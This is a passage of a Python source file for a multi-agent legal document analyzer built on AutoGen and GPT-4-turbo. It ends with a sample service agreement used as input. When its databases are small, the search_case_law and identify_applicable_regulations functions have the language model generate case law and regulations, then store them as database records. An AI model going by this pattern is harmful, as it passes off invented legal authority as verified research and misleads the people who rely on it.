236 name="LegalAnalysisCoordinator",
237 human_input_mode="NEVER",
238 code_execution_config=False,
239 system_message="""You are a coordinator for legal document analysis.
240 Your role is to manage the flow of information between the specialized legal agents.
241 You help distribute document content to the right specialists and compile their insights."""
242 )
243
244 def extract_document_structure(self, document_text: str) -> Dict[str, Any]:
245 """
246 Extract structured information from a legal document.
247
248 Args:
249 document_text: Text content of the legal document
250
251 Returns:
252 Dictionary with structured document information
253 """
254 try:
255 # Use OpenAI to extract document structure
256 response = client.chat.completions.create(
257 model="gpt-4-turbo",
258 messages=[
259 {"role": "system", "content": "You are a legal document structure extraction specialist. Extract the hierarchical structure and key metadata from legal documents."},
260 {"role": "user", "content": f"Extract the structure and metadata from this legal document. Return a JSON object with document_type, jurisdiction, date, parties, governing_law, and hierarchical structure (sections, clauses, sub-clauses). For each structural element, include the heading/number and a brief description of the content.\n\nDocument text:\n\n{document_text[:15000]}"}
261 ],
262 temperature=0.2,
263 response_format={"type": "json_object"}
264 )
265
266 # Parse the response
267 structure = json.loads(response.choices[0].message.content)
268
269 return structure
270
271 except Exception as e:
272 print(f"Error extracting document structure: {e}")
273 return {
274 "document_type": "Unknown",
275 "error": str(e),
276 "partial_text": document_text[:100] + "..."
277 }
278
279 def extract_legal_entities(self, document_text: str) -> Dict[str, List[Dict[str, Any]]]:
280 """
281 Extract legal entities from document text.
282
283 Args:
284 document_text: Text content of the legal document
285
286 Returns:
287 Dictionary with extracted entities by category
288 """
289 try:
290 # Use OpenAI to extract legal entities
291 response = client.chat.completions.create(
292 model="gpt-4-turbo",
293 messages=[
294 {"role": "system", "content": "You are a legal entity extraction specialist who identifies parties, jurisdictions, legal references, dates, and key terms in legal documents."},
295 {"role": "user", "content": f"Extract all legal entities from this document. Return a JSON object with these categories: parties (individuals and organizations), jurisdictions, legal_references (statutes, cases, regulations), dates (with context), monetary_values, and defined_terms.\n\nFor each entity, include the entity text, category, context (surrounding text), and a confidence score (0-1).\n\nDocument text:\n\n{document_text[:15000]}"}
296 ],
297 temperature=0.2,
298 response_format={"type": "json_object"}
299 )
300
301 # Parse the response
302 entities = json.loads(response.choices[0].message.content)
303
304 return entities
305
306 except Exception as e:
307 print(f"Error extracting legal entities: {e}")
308 return {
309 "parties": [],
310 "jurisdictions": [],
311 "legal_references": [],
312 "dates": [],
313 "monetary_values": [],
314 "defined_terms": [],
315 "error": str(e)
316 }
317
318 def identify_obligations_and_rights(self, document_text: str) -> Dict[str, List[Dict[str, Any]]]:
319 """
320 Identify obligations, rights, and permissions in the document.
321
322 Args:
323 document_text: Text content of the legal document
324
325 Returns:
326 Dictionary with obligations, rights, permissions, and prohibitions
327 """
328 try:
329 # Use OpenAI to identify obligations and rights
330 response = client.chat.completions.create(
331 model="gpt-4-turbo",
332 messages=[
333 {"role": "system", "content": "You are a legal rights and obligations specialist who identifies commitments, permissions, prohibitions, and conditions in legal documents."},
334 {"role": "user", "content": f"Identify all obligations, rights, permissions, and prohibitions in this legal document. Return a JSON object with these categories: obligations (must do), rights (entitled to), permissions (may do), and prohibitions (must not do).\n\nFor each item, include the text, the subject (who it applies to), the object (what it applies to), any conditions, and the location in the document.\n\nDocument text:\n\n{document_text[:15000]}"}
335 ],
336 temperature=0.2,
337 response_format={"type": "json_object"}
338 )
339
340 # Parse the response
341 rights_obligations = json.loads(response.choices[0].message.content)
342
343 return rights_obligations
344
345 except Exception as e:
346 print(f"Error identifying obligations and rights: {e}")
347 return {
348 "obligations": [],
349 "rights": [],
350 "permissions": [],
351 "prohibitions": [],
352 "error": str(e)
353 }
354
355 def search_case_law(self, query: str, jurisdiction: str = None, limit: int = 5) -> List[Dict[str, Any]]:
356 """
357 Search for relevant case law based on query.
358
359 Args:
360 query: Search query
361 jurisdiction: Optional jurisdiction filter
362 limit: Maximum number of results
363
364 Returns:
365 List of relevant case law entries
366 """
367 results = []
368
369 # If we have a small or empty database, use OpenAI to generate relevant case law
370 if len(self.case_law_db.get("cases", {})) < 10:
371 try:
372 # Generate relevant case law using OpenAI
373 response = client.chat.completions.create(
374 model="gpt-4-turbo",
375 messages=[
376 {"role": "system", "content": "You are a legal research specialist with expertise in case law across multiple jurisdictions."},
377 {"role": "user", "content": f"Find {limit} relevant case law precedents for this legal question or issue. If a specific jurisdiction is mentioned, prioritize cases from that jurisdiction.\n\nQuery: {query}\nJurisdiction: {jurisdiction if jurisdiction else 'Any'}\n\nFor each case, provide the case name, citation, jurisdiction, year, key holdings, and relevance to the query. Return as a JSON array."}
378 ],
379 temperature=0.2,
380 response_format={"type": "json_object"}
381 )
382
383 # Parse the response
384 case_law = json.loads(response.choices[0].message.content)
385
386 # If the response is wrapped in a container object, extract the cases array
387 if "cases" in case_law:
388 case_law = case_law["cases"]
389
390 # Add generated cases to the database
391 for case in case_law:
392 case_id = str(uuid.uuid4())
393 self.case_law_db["cases"][case_id] = case
394
395 # Add to jurisdictions index
396 case_jurisdiction = case.get("jurisdiction", "Unknown")
397 if case_jurisdiction not in self.case_law_db["jurisdictions"]:
398 self.case_law_db["jurisdictions"][case_jurisdiction] = []
399 self.case_law_db["jurisdictions"][case_jurisdiction].append(case_id)
400
401 # Add to areas of law index
402 areas = case.get("areas_of_law", [])
403 if isinstance(areas, str):
404 areas = [areas]
405
406 for area in areas:
407 if area not in self.case_law_db["areas_of_law"]:
408 self.case_law_db["areas_of_law"][area] = []
409 self.case_law_db["areas_of_law"][area].append(case_id)
410
411 # Add to citations index
412 citation = case.get("citation", "")
413 if citation:
414 self.case_law_db["citations"][citation] = case_id
415
416 # Save the updated database
417 self.save_case_law_db()
418
419 return case_law
420
421 except Exception as e:
422 print(f"Error generating case law: {e}")
423 return []
424
425 # Search the existing database
426 # This is a simplified search - in a real application, this would use vector embeddings
427 # and more sophisticated matching
428
429 # First, search by jurisdiction if specified
430 jurisdiction_cases = []
431 if jurisdiction and jurisdiction in self.case_law_db.get("jurisdictions", {}):
432 jurisdiction_case_ids = self.case_law_db["jurisdictions"][jurisdiction]
433 jurisdiction_cases = [self.case_law_db["cases"][case_id] for case_id in jurisdiction_case_ids if case_id in self.case_law_db["cases"]]
434
435 # If no jurisdiction specified or no cases found, use all cases
436 search_cases = jurisdiction_cases if jurisdiction_cases else list(self.case_law_db["cases"].values())
437
438 # Convert query to lowercase for case-insensitive matching
439 query_lower = query.lower()
440
441 # Filter cases by relevance to query
442 for case in search_cases:
443 # Check if query terms appear in case name, holdings, or summary
444 case_text = (
445 case.get("case_name", "").lower() + " " +
446 case.get("key_holdings", "").lower() + " " +
447 case.get("summary", "").lower()
448 )
449
450 if query_lower in case_text:
451 # Calculate a simple relevance score based on term frequency
452 relevance = case_text.count(query_lower) / len(case_text.split())
453
454 results.append({
455 **case,
456 "relevance_score": relevance
457 })
458
459 # Sort by relevance and limit results
460 results.sort(key=lambda x: x.get("relevance_score", 0), reverse=True)
461 return results[:limit]
462
463 def identify_applicable_regulations(self, document_text: str, jurisdiction: str = None, industry: str = None) -> List[Dict[str, Any]]:
464 """
465 Identify regulations that may apply to the document.
466
467 Args:
468 document_text: Text content of the legal document
469 jurisdiction: Optional jurisdiction filter
470 industry: Optional industry filter
471
472 Returns:
473 List of applicable regulations with compliance considerations
474 """
475 # If we have a small or empty database, use OpenAI to generate applicable regulations
476 if len(self.compliance_db.get("regulations", {})) < 10:
477 try:
478 # Extract document type and key elements first
479 doc_structure = self.extract_document_structure(document_text)
480 doc_type = doc_structure.get("document_type", "Unknown")
481 doc_jurisdiction = doc_structure.get("jurisdiction", jurisdiction)
482
483 # Generate applicable regulations using OpenAI
484 prompt = f"""Identify regulations that apply to this {doc_type} document"""
485 if doc_jurisdiction:
486 prompt += f" in {doc_jurisdiction}"
487 if industry:
488 prompt += f" for the {industry} industry"
489
490 prompt += f""". The document contains the following key elements:
491
492 Document Type: {doc_type}
493 Jurisdiction: {doc_jurisdiction if doc_jurisdiction else 'Unknown'}
494 Industry: {industry if industry else 'Unknown'}
495
496 For each regulation, provide:
497 1. The full name and common abbreviation
498 2. Jurisdiction
499 3. Key compliance requirements relevant to this document
500 4. Specific sections of the regulation that apply
501 5. Risk level for non-compliance (High, Medium, Low)
502
503 Return as a JSON array of regulations.
504
505 Document excerpt:
506 {document_text[:2000]}...
507 """
508
509 response = client.chat.completions.create(
510 model="gpt-4-turbo",
511 messages=[
512 {"role": "system", "content": "You are a legal compliance specialist with expertise in regulatory requirements across multiple jurisdictions and industries."},
513 {"role": "user", "content": prompt}
514 ],
515 temperature=0.2,
516 response_format={"type": "json_object"}
517 )
518
519 # Parse the response
520 regulations = json.loads(response.choices[0].message.content)
521
522 # If the response is wrapped in a container object, extract the regulations array
523 if "regulations" in regulations:
524 regulations = regulations["regulations"]
525
526 # Add generated regulations to the database
527 for regulation in regulations:
528 regulation_id = str(uuid.uuid4())
529 self.compliance_db["regulations"][regulation_id] = regulation
530
531 # Add to jurisdictions index
532 reg_jurisdiction = regulation.get("jurisdiction", "Unknown")
533 if reg_jurisdiction not in self.compliance_db["jurisdictions"]:
534 self.compliance_db["jurisdictions"][reg_jurisdiction] = []
535 self.compliance_db["jurisdictions"][reg_jurisdiction].append(regulation_id)
536
537 # Add to industries index if applicable
538 if industry:
539 if industry not in self.compliance_db["industries"]:
540 self.compliance_db["industries"][industry] = []
541 self.compliance_db["industries"][industry].append(regulation_id)
542
543 # Save the updated database
544 self.save_compliance_db()
545
546 return regulations
547
548 except Exception as e:
549 print(f"Error identifying applicable regulations: {e}")
550 return []
551
552 # Search the existing database
553 # This is a simplified search - in a real application, this would use more sophisticated matching
554
555 # Filter by jurisdiction if specified
556 jurisdiction_regulations = []
557 if jurisdiction and jurisdiction in self.compliance_db.get("jurisdictions", {}):
558 jurisdiction_reg_ids = self.compliance_db["jurisdictions"][jurisdiction]
559 jurisdiction_regulations = [self.compliance_db["regulations"][reg_id] for reg_id in jurisdiction_reg_ids if reg_id in self.compliance_db["regulations"]]
560
561 # Filter by industry if specified
562 industry_regulations = []
563 if industry and industry in self.compliance_db.get("industries", {}):
564 industry_reg_ids = self.compliance_db["industries"][industry]
565 industry_regulations = [self.compliance_db["regulations"][reg_id] for reg_id in industry_reg_ids if reg_id in self.compliance_db["regulations"]]
566
567 # If both filters specified, find intersection
568 if jurisdiction and industry:
569 results = [reg for reg in jurisdiction_regulations if reg in industry_regulations]
570 elif jurisdiction:
571 results = jurisdiction_regulations
572 elif industry:
573 results = industry_regulations
574 else:
575 # If no filters, return all regulations
576 results = list(self.compliance_db["regulations"].values())
577
578 # Sort by relevance (this would be more sophisticated in a real application)
579 results.sort(key=lambda x: x.get("risk_level", "Medium") == "High", reverse=True)
580
581 return results
582
583 def assess_compliance(self, document_text: str, regulations: List[Dict[str, Any]]) -> Dict[str, Any]:
584 """
585 Assess document compliance with specified regulations.
586
587 Args:
588 document_text: Text content of the legal document
589 regulations: List of regulations to assess against
590
591 Returns:
592 Compliance assessment with issues and recommendations
593 """
594 try:
595 # Prepare regulations for the prompt
596 regulations_text = json.dumps(regulations, indent=2)
597
598 # Use OpenAI to assess compliance
599 response = client.chat.completions.create(
600 model="gpt-4-turbo",
601 messages=[
602 {"role": "system", "content": "You are a legal compliance specialist who assesses documents for regulatory compliance issues."},
603 {"role": "user", "content": f"Assess this legal document for compliance with the specified regulations. Identify compliance issues, their severity, and provide specific recommendations for addressing each issue.\n\nRegulations to assess against:\n{regulations_text}\n\nDocument text:\n{document_text[:10000]}"}
604 ],
605 temperature=0.2,
606 response_format={"type": "json_object"}
607 )
608
609 # Parse the response
610 assessment = json.loads(response.choices[0].message.content)
611
612 return assessment
613
614 except Exception as e:
615 print(f"Error assessing compliance: {e}")
616 return {
617 "compliance_score": 0,
618 "issues": [],
619 "recommendations": [],
620 "error": str(e)
621 }
622
623 def identify_legal_issues(self, document_text: str, document_type: str = None) -> Dict[str, Any]:
624 """
625 Identify potential legal issues and risks in the document.
626
627 Args:
628 document_text: Text content of the legal document
629 document_type: Optional document type for context
630
631 Returns:
632 Dictionary with identified issues, risks, and recommendations
633 """
634 try:
635 # Use OpenAI to identify legal issues
636 prompt = "Identify potential legal issues, risks, and ambiguities in this document."
637 if document_type:
638 prompt += f" This is a {document_type} document."
639
640 prompt += f"\n\nFor each issue, provide:\n1. Issue description\n2. Severity (High, Medium, Low)\n3. Location in the document\n4. Potential consequences\n5. Recommended remediation\n\nDocument text:\n{document_text[:10000]}"
641
642 response = client.chat.completions.create(
643 model="gpt-4-turbo",
644 messages=[
645 {"role": "system", "content": "You are a legal risk assessment specialist who identifies potential issues, ambiguities, and risks in legal documents."},
646 {"role": "user", "content": prompt}
647 ],
648 temperature=0.3,
649 response_format={"type": "json_object"}
650 )
651
652 # Parse the response
653 issues = json.loads(response.choices[0].message.content)
654
655 return issues
656
657 except Exception as e:
658 print(f"Error identifying legal issues: {e}")
659 return {
660 "issues": [],
661 "overall_risk_level": "Unknown",
662 "error": str(e)
663 }
664
665 def generate_document_summary(self, document_text: str, analysis_results: Dict[str, Any]) -> Dict[str, Any]:
666 """
667 Generate a comprehensive summary of the document and analysis.
668
669 Args:
670 document_text: Text content of the legal document
671 analysis_results: Results from previous analysis steps
672
673 Returns:
674 Dictionary with executive summary and detailed summary
675 """
676 try:
677 # Prepare analysis results for the prompt
678 analysis_text = json.dumps(analysis_results, indent=2)
679
680 # Use OpenAI to generate summary
681 response = client.chat.completions.create(
682 model="gpt-4-turbo",
683 messages=[
684 {"role": "system", "content": "You are a legal document summarization specialist who creates clear, comprehensive summaries of legal documents and their analysis."},
685 {"role": "user", "content": f"Create a comprehensive summary of this legal document based on the document text and analysis results. Include both an executive summary (brief overview for non-legal audience) and a detailed summary (comprehensive analysis for legal professionals).\n\nAnalysis results:\n{analysis_text}\n\nDocument text:\n{document_text[:5000]}"}
686 ],
687 temperature=0.3,
688 response_format={"type": "json_object"}
689 )
690
691 # Parse the response
692 summary = json.loads(response.choices[0].message.content)
693
694 return summary
695
696 except Exception as e:
697 print(f"Error generating document summary: {e}")
698 return {
699 "executive_summary": "Error generating summary",
700 "detailed_summary": f"Error: {str(e)}",
701 "error": str(e)
702 }
703
704 def verify_citations(self, document_text: str) -> Dict[str, Any]:
705 """
706 Verify legal citations in the document.
707
708 Args:
709 document_text: Text content of the legal document
710
711 Returns:
712 Dictionary with verification results for each citation
713 """
714 try:
715 # Use OpenAI to extract and verify citations
716 response = client.chat.completions.create(
717 model="gpt-4-turbo",
718 messages=[
719 {"role": "system", "content": "You are a legal citation specialist who extracts and verifies legal citations in documents."},
720 {"role": "user", "content": f"Extract and verify all legal citations in this document. For each citation, identify:\n1. The citation text\n2. Citation type (case, statute, regulation, etc.)\n3. Whether the citation appears to be valid, formatted correctly, and used in the proper context\n4. Any issues or corrections needed\n\nReturn as a JSON object with an array of citations.\n\nDocument text:\n{document_text[:15000]}"}
721 ],
722 temperature=0.2,
723 response_format={"type": "json_object"}
724 )
725
726 # Parse the response
727 citations = json.loads(response.choices[0].message.content)
728
729 return citations
730
731 except Exception as e:
732 print(f"Error verifying citations: {e}")
733 return {
734 "citations": [],
735 "error": str(e)
736 }
737
738 def analyze_document(self, document_text: str, document_type: str = None, jurisdiction: str = None, industry: str = None) -> Dict[str, Any]:
739 """
740 Perform comprehensive analysis of a legal document.
741
742 Args:
743 document_text: Text content of the legal document
744 document_type: Optional document type
745 jurisdiction: Optional jurisdiction
746 industry: Optional industry context
747
748 Returns:
749 Dictionary with comprehensive document analysis
750 """
751 # Generate a unique analysis ID
752 analysis_id = f"ANALYSIS-{uuid.uuid4().hex[:8]}"
753
754 # Create group chat for agent collaboration
755 groupchat = autogen.GroupChat(
756 agents=[
757 self.user_proxy,
758 self.document_parser,
759 self.legal_researcher,
760 self.compliance_analyst,
761 self.issue_spotter,
762 self.legal_summarizer
763 ],
764 messages=[],
765 max_round=15
766 )
767
768 manager = autogen.GroupChatManager(groupchat=groupchat)
769
770 # Step 1: Extract document structure
771 structure = self.extract_document_structure(document_text)
772
773 # If document_type wasn't provided, use the one from structure analysis
774 if not document_type and "document_type" in structure:
775 document_type = structure.get("document_type")
776
777 # If jurisdiction wasn't provided, use the one from structure analysis
778 if not jurisdiction and "jurisdiction" in structure:
779 jurisdiction = structure.get("jurisdiction")
780
781 # Step 2: Extract legal entities
782 entities = self.extract_legal_entities(document_text)
783
784 # Step 3: Identify obligations and rights
785 rights_obligations = self.identify_obligations_and_rights(document_text)
786
787 # Step 4: Search for relevant case law
788 # Create a search query based on document type and key entities
789 search_query = f"{document_type if document_type else 'legal document'}"
790 if jurisdiction:
791 search_query += f" {jurisdiction}"
792 if "key_topics" in structure:
793 topics = structure.get("key_topics", [])
794 if isinstance(topics, list) and topics:
795 search_query += f" {' '.join(topics[:3])}"
796
797 case_law = self.search_case_law(search_query, jurisdiction=jurisdiction)
798
799 # Step 5: Identify applicable regulations
800 regulations = self.identify_applicable_regulations(document_text, jurisdiction=jurisdiction, industry=industry)
801
802 # Step 6: Assess compliance
803 compliance = self.assess_compliance(document_text, regulations)
804
805 # Step 7: Identify legal issues and risks
806 issues = self.identify_legal_issues(document_text, document_type=document_type)
807
808 # Prepare analysis data for the agents
809 document_excerpt = document_text[:3000] + ("..." if len(document_text) > 3000 else "")
810
811 analysis_data = {
812 "document_structure": structure,
813 "entities": entities,
814 "rights_obligations": rights_obligations,
815 "case_law": case_law,
816 "regulations": regulations,
817 "compliance": compliance,
818 "issues": issues
819 }
820
821 # Convert analysis data to a readable format for the prompt
822 analysis_summary = json.dumps(analysis_data, indent=2)
823
824 # Generate initial prompt for the agent team
825 analysis_prompt = f"""
826 LEGAL DOCUMENT ANALYSIS
827 Analysis ID: {analysis_id}
828 Document Type: {document_type if document_type else 'Unknown'}
829 Jurisdiction: {jurisdiction if jurisdiction else 'Unknown'}
830 Industry: {industry if industry else 'Unknown'}
831
832 I need your collaborative analysis of this legal document. Initial automated analysis has identified the following:
833
834 DOCUMENT STRUCTURE:
835 Type: {structure.get('document_type', 'Unknown')}
836 Jurisdiction: {structure.get('jurisdiction', 'Unknown')}
837 Date: {structure.get('date', 'Unknown')}
838 Parties: {', '.join(str(p) for p in structure.get('parties', []))}
839
840 DOCUMENT EXCERPT:
841 {document_excerpt}
842
843 DETAILED ANALYSIS RESULTS:
844 {analysis_summary}
845
846 I need the team to work together to provide:
847 1. DocumentParser: Analyze the document structure and identify key provisions
848 2. LegalResearcher: Analyze relevant case law and legal precedents
849 3. ComplianceAnalyst: Evaluate regulatory compliance issues
850 4. IssueSpotter: Identify legal risks and potential issues
851 5. LegalSummarizer: Create a comprehensive yet concise summary of findings
852
853 The LegalAnalysisCoordinator (me) will coordinate your work. Please be specific, thorough, and actionable in your analysis.
854 """
855
856 # Start the group chat
857 result = self.user_proxy.initiate_chat(
858 manager,
859 message=analysis_prompt
860 )
861
862 # Extract the final summary
863 final_summary = None
864 for message in reversed(self.user_proxy.chat_history):
865 if message['role'] == 'assistant' and 'LegalSummarizer' in message.get('name', ''):
866 final_summary = message['content']
867 break
868
869 if not final_summary:
870 # Use the last substantial response if no clear summary
871 for message in reversed(self.user_proxy.chat_history):
872 if message['role'] == 'assistant' and len(message['content']) > 500:
873 final_summary = message['content']
874 break
875
876 # Step 8: Generate document summary
877 summary = {
878 "executive_summary": "See full summary below",
879 "detailed_summary": final_summary
880 }
881
882 # Step 9: Verify citations
883 citation_verification = self.verify_citations(document_text)
884
885 # Compile the complete analysis results
886 analysis_result = {
887 "analysis_id": analysis_id,
888 "timestamp": datetime.datetime.now().isoformat(),
889 "document_type": document_type,
890 "jurisdiction": jurisdiction,
891 "industry": industry,
892 "structure": structure,
893 "entities": entities,
894 "rights_obligations": rights_obligations,
895 "relevant_case_law": case_law,
896 "applicable_regulations": regulations,
897 "compliance_assessment": compliance,
898 "legal_issues": issues,
899 "citation_verification": citation_verification,
900 "summary": summary,
901 "metadata": {
902 "document_length": len(document_text),
903 "analysis_version": "1.0"
904 }
905 }
906
907 # Save to analysis history
908 self.analysis_history[analysis_id] = {
909 "timestamp": datetime.datetime.now().isoformat(),
910 "document_type": document_type,
911 "jurisdiction": jurisdiction,
912 "industry": industry,
913 "summary": summary.get("executive_summary", "")
914 }
915
916 # Save analysis history
917 try:
918 with open(self.history_path, 'w') as f:
919 json.dump(self.analysis_history, f, indent=2)
920 print("Analysis history saved successfully")
921 except Exception as e:
922 print(f"Error saving analysis history: {e}")
923
924 return analysis_result
925
926 def get_analysis_history(self) -> Dict[str, Dict[str, Any]]:
927 """
928 Get the history of document analyses.
929
930 Returns:
931 Dictionary with analysis history
932 """
933 return self.analysis_history
934
935 def compare_documents(self, document1_text: str, document2_text: str, comparison_type: str = "general") -> Dict[str, Any]:
936 """
937 Compare two legal documents and identify differences.
938
939 Args:
940 document1_text: Text of first document
941 document2_text: Text of second document
942 comparison_type: Type of comparison (general, clause, version)
943
944 Returns:
945 Dictionary with comparison results
946 """
947 try:
948 # Extract structure for both documents
949 structure1 = self.extract_document_structure(document1_text)
950 structure2 = self.extract_document_structure(document2_text)
951
952 # Prepare comparison prompt based on comparison type
953 if comparison_type == "clause":
954 # Detailed clause-by-clause comparison
955 comparison_prompt = f"""Compare these two legal documents clause by clause. Identify:
956 1. Clauses that appear in both documents but have differences
957 2. Clauses that appear only in Document 1
958 3. Clauses that appear only in Document 2
959 4. Changes in legal obligations, rights, or liabilities
960 5. The legal implications of these differences
961
962 Document 1 structure:
963 {json.dumps(structure1, indent=2)}
964
965 Document 2 structure:
966 {json.dumps(structure2, indent=2)}
967
968 Provide a clause-by-clause comparison with specific references to the differences and their legal implications.
969 """
970 elif comparison_type == "version":
971 # Version comparison (e.g., different versions of same document)
972 comparison_prompt = f"""Compare these two versions of the legal document. Identify:
973 1. All changes between versions, highlighting additions, deletions, and modifications
974 2. The significance of each change
975 3. How the changes affect legal obligations, rights, or liabilities
976 4. Whether the changes strengthen or weaken any party's position
977 5. Any new risks or opportunities introduced by the changes
978
979 Original document:
980 {document1_text[:5000]}
981
982 New version:
983 {document2_text[:5000]}
984
985 Focus on substantive changes rather than formatting differences.
986 """
987 else:
988 # General comparison
989 comparison_prompt = f"""Compare these two legal documents. Identify:
990 1. Key similarities and differences
991 2. Differences in scope, obligations, rights, and liabilities
992 3. Relative advantages and disadvantages for involved parties
993 4. Which document provides better protections and for whom
994 5. Recommendations based on the comparison
995
996 Document 1:
997 Type: {structure1.get('document_type', 'Unknown')}
998 {document1_text[:3000]}
999
1000 Document 2:
1001 Type: {structure2.get('document_type', 'Unknown')}
1002 {document2_text[:3000]}
1003
1004 Provide a comprehensive comparison with specific references to important differences.
1005 """
1006
1007 # Use OpenAI to generate comparison
1008 response = client.chat.completions.create(
1009 model="gpt-4-turbo",
1010 messages=[
1011 {"role": "system", "content": "You are a legal document comparison specialist who identifies and analyzes differences between legal documents."},
1012 {"role": "user", "content": comparison_prompt}
1013 ],
1014 temperature=0.3,
1015 response_format={"type": "json_object"}
1016 )
1017
1018 # Parse the response
1019 comparison = json.loads(response.choices[0].message.content)
1020
1021 # Add document metadata to comparison
1022 comparison["document1_metadata"] = {
1023 "document_type": structure1.get("document_type", "Unknown"),
1024 "jurisdiction": structure1.get("jurisdiction", "Unknown"),
1025 "date": structure1.get("date", "Unknown"),
1026 "parties": structure1.get("parties", [])
1027 }
1028
1029 comparison["document2_metadata"] = {
1030 "document_type": structure2.get("document_type", "Unknown"),
1031 "jurisdiction": structure2.get("jurisdiction", "Unknown"),
1032 "date": structure2.get("date", "Unknown"),
1033 "parties": structure2.get("parties", [])
1034 }
1035
1036 return comparison
1037
1038 except Exception as e:
1039 print(f"Error comparing documents: {e}")
1040 return {
1041 "error": str(e),
1042 "comparison_type": comparison_type,
1043 "document1_excerpt": document1_text[:100] + "...",
1044 "document2_excerpt": document2_text[:100] + "..."
1045 }
1046
1047# Example usage
1048if __name__ == "__main__":
1049 # Create the legal document analyzer
1050 legal_analyzer = LegalDocumentAnalyzer()
1051
1052 # Example contract
1053 example_contract = """
1054 SERVICE AGREEMENT
1055
1056 This Service Agreement (the "Agreement") is entered into as of January 15, 2023 (the "Effective Date"), by and between ABC Technology Solutions, Inc., a Delaware corporation with its principal place of business at 123 Tech Lane, San Francisco, CA 94105 ("Provider"), and XYZ Corporation, a Nevada corporation with its principal place of business at 456 Business Avenue, Las Vegas, NV 89101 ("Client").
1057
1058 WHEREAS, Provider is in the business of providing cloud computing and software development services; and
1059
1060 WHEREAS, Client desires to engage Provider to provide certain services as set forth herein.
1061
1062 NOW, THEREFORE, in consideration of the mutual covenants and agreements contained herein, the parties agree as follows:
1063
1064 1. SERVICES
1065
1066 1.1 Services. Provider shall provide to Client the services (the "Services") described in each Statement of Work executed by the parties and attached hereto as Exhibit A. Additional Statements of Work may be added to this Agreement upon mutual written agreement of the parties.
1067
1068 1.2 Change Orders. Either party may request changes to the scope of Services by submitting a written change request. No change shall be effective until mutually agreed upon by both parties in writing.
1069
1070 2. TERM AND TERMINATION
1071
1072 2.1 Term. This Agreement shall commence on the Effective Date and shall continue for a period of three (3) years, unless earlier terminated as provided herein (the "Initial Term"). Thereafter, this Agreement shall automatically renew for successive one (1) year periods (each, a "Renewal Term"), unless either party provides written notice of non-renewal at least ninety (90) days prior to the end of the then-current term.
1073
1074 2.2 Termination for Convenience. Client may terminate this Agreement or any Statement of Work, in whole or in part, for convenience upon thirty (30) days' prior written notice to Provider. In the event of such termination, Client shall pay Provider for all Services provided up to the effective date of termination.
1075
1076 2.3 Termination for Cause. Either party may terminate this Agreement immediately upon written notice if the other party: (a) commits a material breach of this Agreement and fails to cure such breach within thirty (30) days after receiving written notice thereof; or (b) becomes insolvent, files for bankruptcy, or makes an assignment for the benefit of creditors.
1077
1078 3. COMPENSATION
1079
1080 3.1 Fees. Client shall pay Provider the fees set forth in each Statement of Work.
1081
1082 3.2 Invoicing and Payment. Provider shall invoice Client monthly for Services performed. Client shall pay all undisputed amounts within thirty (30) days of receipt of invoice. Late payments shall accrue interest at the rate of 1.5% per month or the highest rate permitted by law, whichever is lower.
1083
1084 3.3 Taxes. All fees are exclusive of taxes. Client shall be responsible for all sales, use, and excise taxes, and any other similar taxes, duties, and charges imposed by any federal, state, or local governmental entity.
1085
1086 4. INTELLECTUAL PROPERTY
1087
1088 4.1 Client Materials. Client shall retain all right, title, and interest in and to all materials provided by Client to Provider (the "Client Materials").
1089
1090 4.2 Provider Materials. Provider shall retain all right, title, and interest in and to all materials that Provider owned prior to the Effective Date or develops independently of its obligations under this Agreement (the "Provider Materials").
1091
1092 4.3 Work Product. Upon full payment of all amounts due under this Agreement, Provider hereby assigns to Client all right, title, and interest in and to all materials developed specifically for Client under this Agreement (the "Work Product"), excluding any Provider Materials.
1093
1094 4.4 License to Provider Materials. Provider hereby grants to Client a non-exclusive, non-transferable, worldwide license to use the Provider Materials solely to the extent necessary to use the Work Product.
1095
1096 5. CONFIDENTIALITY
1097
1098 5.1 Definition. "Confidential Information" means all non-public information disclosed by one party (the "Disclosing Party") to the other party (the "Receiving Party"), whether orally or in writing, that is designated as confidential or that reasonably should be understood to be confidential given the nature of the information and the circumstances of disclosure.
1099
1100 5.2 Obligations. The Receiving Party shall: (a) protect the confidentiality of the Disclosing Party's Confidential Information using the same degree of care that it uses to protect the confidentiality of its own confidential information of like kind (but in no event less than reasonable care); (b) not use any Confidential Information for any purpose outside the scope of this Agreement; and (c) not disclose Confidential Information to any third party without prior written consent.
1101
1102 5.3 Exclusions. Confidential Information shall not include information that: (a) is or becomes generally known to the public; (b) was known to the Receiving Party prior to its disclosure by the Disclosing Party; (c) is received from a third party without restriction; or (d) was independently developed without use of Confidential Information.
1103
1104 6. REPRESENTATIONS AND WARRANTIES
1105
1106 6.1 Provider Warranties. Provider represents and warrants that: (a) it has the legal right to enter into this Agreement and perform its obligations hereunder; (b) the Services will be performed in a professional and workmanlike manner in accordance with generally accepted industry standards; and (c) the Services and Work Product will not infringe the intellectual property rights of any third party.
1107
1108 6.2 Disclaimer. EXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, PROVIDER MAKES NO WARRANTIES OF ANY KIND, WHETHER EXPRESS, IMPLIED, STATUTORY OR OTHERWISE, AND SPECIFICALLY DISCLAIMS ALL IMPLIED WARRANTIES, INCLUDING ANY WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, TO THE MAXIMUM EXTENT PERMITTED BY APPLICABLE LAW.
1109
1110 7. LIMITATION OF LIABILITY
1111
1112 7.1 Exclusion of Indirect Damages. NEITHER PARTY SHALL BE LIABLE TO THE OTHER PARTY FOR ANY INDIRECT, INCIDENTAL, CONSEQUENTIAL, SPECIAL, PUNITIVE, OR EXEMPLARY DAMAGES ARISING OUT OF OR RELATED TO THIS AGREEMENT, EVEN IF THE PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
1113
1114 7.2 Cap on Liability. EACH PARTY'S TOTAL CUMULATIVE LIABILITY ARISING OUT OF OR RELATED TO THIS AGREEMENT SHALL NOT EXCEED THE TOTAL AMOUNT PAID BY CLIENT UNDER THIS AGREEMENT DURING THE TWELVE (12) MONTHS IMMEDIATELY PRECEDING THE EVENT GIVING RISE TO LIABILITY.
1115
1116 7.3 Exceptions. The limitations in Sections 7.1 and 7.2 shall not apply to: (a) breaches of confidentiality obligations; (b) infringement of intellectual property rights; (c) breaches of Section 8 (Indemnification); or (d) a party's gross negligence, fraud, or willful misconduct.
1117
1118 8. INDEMNIFICATION
1119
1120 8.1 Provider Indemnification. Provider shall defend, indemnify, and hold harmless Client from and against any claim, demand, suit, or proceeding made or brought against Client by a third party alleging that the Services or Work Product infringes such third party's intellectual property rights (an "Infringement Claim").
1121
